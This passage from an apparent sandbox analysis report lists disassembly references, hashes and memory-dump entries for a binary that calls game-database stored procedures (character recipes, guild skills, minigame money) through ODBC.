                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetValidPeriod] (?,?,?)}
                                                                                      • API String ID: 0-1972007198
                                                                                      • Opcode ID: 0f97161afb3bf5bd773a5fc27f619ae7612857b6a5fba8632c5a3f5bb53050a1
                                                                                      • Instruction ID: b816afac22d75838d956eb411469a26bd93a8d3ec16d2eeb8068841158537f39
                                                                                      • Opcode Fuzzy Hash: 0f97161afb3bf5bd773a5fc27f619ae7612857b6a5fba8632c5a3f5bb53050a1
                                                                                      • Instruction Fuzzy Hash: 593123B1B847147BFB608B54CC46FAA7334EB85B14F20C688F7186E6C0DAB56D808F49
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsertCharacterRecipe](?,?,?)},000000FD), ref: 004365CD
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043660C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00436641
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00436679
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004366B1
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsertCharacterRecipe](?,?,?)}, xrefs: 004365C4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsertCharacterRecipe](?,?,?)}
                                                                                      • API String ID: 0-3401302940
                                                                                      • Opcode ID: a0ec37c8eefa510c6284bd66a4c47a68b25f6789086fa82abd9aabee15cc5647
                                                                                      • Instruction ID: 04ffc0c6000ac086e9296de2cc9d03c2e26e58adbaa3ee6c185438dee3d65e88
                                                                                      • Opcode Fuzzy Hash: a0ec37c8eefa510c6284bd66a4c47a68b25f6789086fa82abd9aabee15cc5647
                                                                                      • Instruction Fuzzy Hash: 8A31F2B06842187BFB248B54CC52FA97375EB88B14F208789F7146E6C5DAB5AD408F5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohangame_pLucky_GetNum] (?, ?, ?)},000000FD), ref: 004416D6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00441722
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0044175C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 00441794
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004417CC
                                                                                      Strings
                                                                                      • { ? = CALL [Rohangame_pLucky_GetNum] (?, ?, ?)}, xrefs: 004416CD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohangame_pLucky_GetNum] (?, ?, ?)}
                                                                                      • API String ID: 0-1717943130
                                                                                      • Opcode ID: e43a3aed54fc27cdd334dfe3140f2307f18faed8a9b50492e360400e1ac17707
                                                                                      • Instruction ID: 232172c207588b26c1945ba5a9465687adb79bf80a3de000318a5a726b882a47
                                                                                      • Opcode Fuzzy Hash: e43a3aed54fc27cdd334dfe3140f2307f18faed8a9b50492e360400e1ac17707
                                                                                      • Instruction Fuzzy Hash: 0831FBB5A80718BBEB248B44CC52FEA7379EB44F18F148189F7186E6C1D6B56B408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_AddMinigameMoneyWeb] (?, ?, ?)},000000FD), ref: 004356EC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043572B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435760
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000004,00000000), ref: 00435798
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004357D0
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_AddMinigameMoneyWeb] (?, ?, ?)}, xrefs: 004356E3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_AddMinigameMoneyWeb] (?, ?, ?)}
                                                                                      • API String ID: 0-859304113
                                                                                      • Opcode ID: 26f509e998e64553e41967144179429c9a929b9934fb515e60a1acfc0c8dca1a
                                                                                      • Instruction ID: 6c9b0bb954a9a2318d51e67806a805e3351f1d9058a3f9f8b542598a5ce84854
                                                                                      • Opcode Fuzzy Hash: 26f509e998e64553e41967144179429c9a929b9934fb515e60a1acfc0c8dca1a
                                                                                      • Instruction Fuzzy Hash: 583114B46842147BFB649B54CC56FA97334EBC4B1CF208289F7186E2C5DBB16D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelSkillsGuild] (?, ?, ?)},000000FD), ref: 0042E6D9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E718
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E74D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E785
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042E7BD
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelSkillsGuild] (?, ?, ?)}, xrefs: 0042E6D0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelSkillsGuild] (?, ?, ?)}
                                                                                      • API String ID: 0-3576215244
                                                                                      • Opcode ID: fbac4a9dee4feb826f1f3cac5d67b7f6f4989d5eb3ae09b3fa709c435c8dbd93
                                                                                      • Instruction ID: 479447934e127e615015f51893c39319a48930f8f2c212e298ed72999c77b12b
                                                                                      • Opcode Fuzzy Hash: fbac4a9dee4feb826f1f3cac5d67b7f6f4989d5eb3ae09b3fa709c435c8dbd93
                                                                                      • Instruction Fuzzy Hash: 7331E370AC061B7BEB288B44CD52FBB7335EB84B15F108199F6246E2C5D5B96D408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_InitSkillGuild] (?, ?, ?)},000000FD), ref: 0042E7E7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042E826
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042E85B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042E893
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0042E8CB
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_InitSkillGuild] (?, ?, ?)}, xrefs: 0042E7DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_InitSkillGuild] (?, ?, ?)}
                                                                                      • API String ID: 0-1202206211
                                                                                      • Opcode ID: c4b086fe94ae3874f72decfc573c41fae2bbf86ed2946295072efab7feef4d76
                                                                                      • Instruction ID: b255a01c27b3d8c7f684e160438b2ca82a80a1adc55befb7238560704ad9c34c
                                                                                      • Opcode Fuzzy Hash: c4b086fe94ae3874f72decfc573c41fae2bbf86ed2946295072efab7feef4d76
                                                                                      • Instruction Fuzzy Hash: A631D1B5A802147BFB24CF54CC52FAB7376EBC4B18F108289F6146E2C5D6B669608B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_UpdateLadderQuestState] (?,?,?)},000000FD), ref: 00433800
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043383F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00433874
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004338AC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004338E4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_UpdateLadderQuestState] (?,?,?)}, xrefs: 004337F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_UpdateLadderQuestState] (?,?,?)}
                                                                                      • API String ID: 0-1662032588
                                                                                      • Opcode ID: 62ea210c04d7f7ea1253cff3e40373ff2988b4bc882a0fdd6ec720fda689ce7a
                                                                                      • Instruction ID: 0c000e88e064f7370842a91b166d8d3fd72121e27d3b1c4b0c55091791c92c54
                                                                                      • Opcode Fuzzy Hash: 62ea210c04d7f7ea1253cff3e40373ff2988b4bc882a0fdd6ec720fda689ce7a
                                                                                      • Instruction Fuzzy Hash: B73125F0AC121B7BFB24CB44CD52FBA7334EB84B14F108399F624AE2C6D5B169408B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DeleteKill] (?, ?, ?)},000000FD), ref: 0042F7C8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F807
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F83C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F874
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F8AC
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DeleteKill] (?, ?, ?)}, xrefs: 0042F7BF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
